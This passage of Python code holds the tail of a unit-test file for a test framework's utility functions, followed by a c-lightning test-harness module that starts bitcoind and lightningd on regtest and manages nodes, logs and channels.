(1, 1),
(2, 2),
(3, 3),
])
self.assertEqual(mock_function.call_count, 3)
mock_function.assert_has_calls(
[mock.call(1, 1), mock.call(2, 2),
mock.call(3, 3)], any_order=True)
def test_concurrent_exec_generates_results(self):
def adder(a, b):
return a + b
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)])
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_exception_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
])
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('123'),
mock.call('not_int'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_exception_generates_results(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
results = utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
])
self.assertEqual(len(results), 4)
self.assertIn(1, results)
self.assertIn(123, results)
self.assertIn(5435, results)
exceptions = [result for result in results if isinstance(result, Exception)]
self.assertEqual(len(exceptions), 1)
self.assertIsInstance(exceptions[0], ValueError)
def test_concurrent_exec_when_multiple_exceptions_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
])
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('not_int1'),
mock.call('not_int2'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_multiple_exceptions_generates_results(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
results = utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
])
self.assertEqual(len(results), 4)
self.assertIn(1, results)
self.assertIn(5435, results)
exceptions = [result for result in results if isinstance(result, Exception)]
self.assertEqual(len(exceptions), 2)
self.assertIsInstance(exceptions[0], ValueError)
self.assertIsInstance(exceptions[1], ValueError)
self.assertNotEqual(exceptions[0], exceptions[1])
def test_concurrent_exec_when_raising_exception_generates_results(self):
def adder(a, b):
return a + b
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)],
raise_on_exception=True)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_raising_exception_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
with self.assertRaisesRegex(RuntimeError, '.*not_int.*'):
_ = utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
],
raise_on_exception=True)
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('123'),
mock.call('not_int'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_raising_multiple_exceptions_makes_all_calls(
self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
with self.assertRaisesRegex(
RuntimeError,
r'(?m).*(not_int1(.|\s)+not_int2|not_int2(.|\s)+not_int1).*'):
_ = utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
],
raise_on_exception=True)
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('not_int1'),
mock.call('not_int2'),
mock.call(5435),
],
any_order=True)
def test_create_dir(self):
new_path = os.path.join(self.tmp_dir, 'haha')
self.assertFalse(os.path.exists(new_path))
utils.create_dir(new_path)
self.assertTrue(os.path.exists(new_path))
def test_create_dir_already_exists(self):
self.assertTrue(os.path.exists(self.tmp_dir))
utils.create_dir(self.tmp_dir)
self.assertTrue(os.path.exists(self.tmp_dir))
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=True)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
def test_get_available_port_positive(self, *_):
self.assertEqual(utils.get_available_host_port(), MOCK_AVAILABLE_PORT)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=False)
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
def test_get_available_port_positive_no_adb(self,
mock_list_occupied_adb_ports, *_):
self.assertEqual(utils.get_available_host_port(), MOCK_AVAILABLE_PORT)
mock_list_occupied_adb_ports.assert_not_called()
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.is_adb_available', return_value=True)
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports',
return_value=[MOCK_AVAILABLE_PORT])
@mock.patch('portpicker.pick_unused_port', return_value=MOCK_AVAILABLE_PORT)
def test_get_available_port_negative(self, *_):
with self.assertRaisesRegex(utils.Error, 'Failed to find.* retries'):
utils.get_available_host_port()
@mock.patch(f'{ADB_MODULE_PACKAGE_NAME}.list_occupied_adb_ports')
def test_get_available_port_returns_free_port(self, _):
"""Verifies logic to pick a free port on the host.
Test checks we can bind to either an ipv4 or ipv6 socket on the port
returned by get_available_host_port.
"""
port = utils.get_available_host_port()
got_socket = False
for family in (socket.AF_INET, socket.AF_INET6):
try:
s = socket.socket(family, socket.SOCK_STREAM)
got_socket = True
break
except socket.error:
continue
self.assertTrue(got_socket)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind(('localhost', port))
finally:
s.close()
def test_load_file_to_base64_str_reads_bytes_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'SGVsbG93IHdvcmxkIQ=='
with io.open(tmp_file_path, 'wb') as f:
f.write(b'Hellow world!')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_load_file_to_base64_str_reads_text_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'SGVsbG93IHdvcmxkIQ=='
with io.open(tmp_file_path, 'w', encoding='utf-8') as f:
f.write(u'Hellow world!')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_load_file_to_base64_str_reads_unicode_file_as_base64_string(self):
tmp_file_path = os.path.join(self.tmp_dir, 'b64.bin')
expected_base64_encoding = u'6YCa'
with io.open(tmp_file_path, 'w', encoding='utf-8') as f:
f.write(u'\u901a')
self.assertEqual(utils.load_file_to_base64_str(tmp_file_path),
expected_base64_encoding)
def test_cli_cmd_to_string(self):
cmd = ['"adb"', 'a b', 'c//']
self.assertEqual(utils.cli_cmd_to_string(cmd), '\'"adb"\' \'a b\' c//')
cmd = 'adb -s meme do something ab_cd'
self.assertEqual(utils.cli_cmd_to_string(cmd), cmd)
def test_get_settable_properties(self):
class SomeClass:
regular_attr = 'regular_attr'
_foo = 'foo'
_bar = 'bar'
@property
def settable_prop(self):
return self._foo
@settable_prop.setter
def settable_prop(self, new_foo):
self._foo = new_foo
@property
def readonly_prop(self):
return self._bar
def func(self):
"""Func should not be considered as a settable prop."""
actual = utils.get_settable_properties(SomeClass)
self.assertEqual(actual, ['settable_prop'])
def test_find_subclasses_in_module_when_one_subclass(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
integration_test)
self.assertEqual(len(subclasses), 1)
self.assertEqual(subclasses[0], integration_test.IntegrationTest)
def test_find_subclasses_in_module_when_indirect_subclass(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
mock_instrumentation_test)
self.assertEqual(len(subclasses), 1)
self.assertEqual(subclasses[0],
mock_instrumentation_test.MockInstrumentationTest)
def test_find_subclasses_in_module_when_no_subclasses(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
mock_controller)
self.assertEqual(len(subclasses), 0)
def test_find_subclasses_in_module_when_multiple_subclasses(self):
subclasses = utils.find_subclasses_in_module([base_test.BaseTestClass],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 2)
self.assertIn(multiple_subclasses_module.Subclass1Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Test, subclasses)
def test_find_subclasses_in_module_when_multiple_base_classes(self):
subclasses = utils.find_subclasses_in_module(
[base_test.BaseTestClass, test_runner.TestRunner],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 4)
self.assertIn(multiple_subclasses_module.Subclass1Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Test, subclasses)
self.assertIn(multiple_subclasses_module.Subclass1Runner, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Runner, subclasses)
def test_find_subclasses_in_module_when_only_some_base_classes_present(self):
subclasses = utils.find_subclasses_in_module(
[signals.TestSignal, test_runner.TestRunner],
multiple_subclasses_module)
self.assertEqual(len(subclasses), 2)
self.assertIn(multiple_subclasses_module.Subclass1Runner, subclasses)
self.assertIn(multiple_subclasses_module.Subclass2Runner, subclasses)
def test_find_subclass_in_module_when_one_subclass(self):
subclass = utils.find_subclass_in_module(base_test.BaseTestClass,
integration_test)
self.assertEqual(subclass, integration_test.IntegrationTest)
def test_find_subclass_in_module_when_indirect_subclass(self):
subclass = utils.find_subclass_in_module(base_test.BaseTestClass,
mock_instrumentation_test)
self.assertEqual(subclass,
mock_instrumentation_test.MockInstrumentationTest)
def test_find_subclass_in_module_when_no_subclasses(self):
with self.assertRaisesRegex(
ValueError, '.*Expected 1 subclass of BaseTestClass per module, found'
r' \[\].*'):
_ = utils.find_subclass_in_module(base_test.BaseTestClass,
mock_controller)
def test_find_subclass_in_module_when_multiple_subclasses(self):
with self.assertRaisesRegex(
ValueError, '.*Expected 1 subclass of BaseTestClass per module, found'
r' \[(\'Subclass1Test\', \'Subclass2Test\''
r'|\'Subclass2Test\', \'Subclass1Test\')\].*'):
_ = utils.find_subclass_in_module(base_test.BaseTestClass,
multiple_subclasses_module)
if __name__ == '__main__':
unittest.main()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from pyln.client import LightningRpc
import json
import logging
import lzma
import math
import os
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
if TEST_DEBUG:
logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
        raise ValueError("Error waiting for {}".format(success))
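# Minimal usage sketch for wait_for (mirrors how it is used below); `bitcoind`
# and `txid` are assumed to exist in the calling scope:
#   wait_for(lambda: txid in bitcoind.rpc.getrawmempool(), timeout=TIMEOUT)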
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
    def stop(self, timeout=10):
        self.save_log()
        self.proc.terminate()
        # Now give it some time to react to the signal; Popen.wait raises
        # TimeoutExpired (rather than returning None) if it does not exit in time.
        try:
            rc = self.proc.wait(timeout)
        except subprocess.TimeoutExpired:
            rc = None
        if rc is None:
            self.proc.kill()
            self.proc.wait()
        self.thread.join()
        return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
                self.logs_cond.notify_all()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
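# Typical usage of the log matchers above, as seen later in this file:
#   daemon.wait_for_log(r'Server started with public key')
#   daemon.wait_for_logs([r'to CHANNELD_NORMAL', r'now ACTIVE'])
# Each call resumes scanning just past the last position it examined
# (self.logsearch_start), so successive waits consume the log in order.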
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
    throwaway connections. This is easier than reaching into the RPC
    library to close, reopen and re-authenticate upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
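# Sketch of how the proxy above is used: every attribute lookup builds a fresh
# authenticated connection, so e.g. (assuming a running bitcoind and a valid
# conf file; the path is hypothetical):
#   rpc = SimpleBitcoinProxy(btc_conf_file='/path/bitcoin.conf')
#   rpc.getblockcount()   # dispatched as proxy._call('getblockcount')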
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
    # True := wait for at least 1 transaction
    # int > 0 := wait for at least N transactions
    # 'tx_id' := wait for one transaction id given as a string
    # ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs are in the mempool
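    # Hedged examples of the accepted forms (`funding_txid` is a hypothetical
    # txid from the surrounding test code):
    #   bitcoind.generate_block(1, wait_for_mempool=True)          # >= 1 tx
    #   bitcoind.generate_block(1, wait_for_mempool=2)             # >= 2 txs
    #   bitcoind.generate_block(6, wait_for_mempool=funding_txid)  # a specific txid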
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
        Note that txs that become invalid at [height] (because of coin maturity, locktime,
        etc.) are removed from the mempool. The length of the new chain will be original + 1
        OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, may_fail=False,
may_reconnect=False, allow_broken_log=False,
allow_bad_gossip=False, db=None, port=None, disconnect=None, random_hsm=None, options=None, **kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = LightningRpc(socket_path, self.executor)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if VALGRIND:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
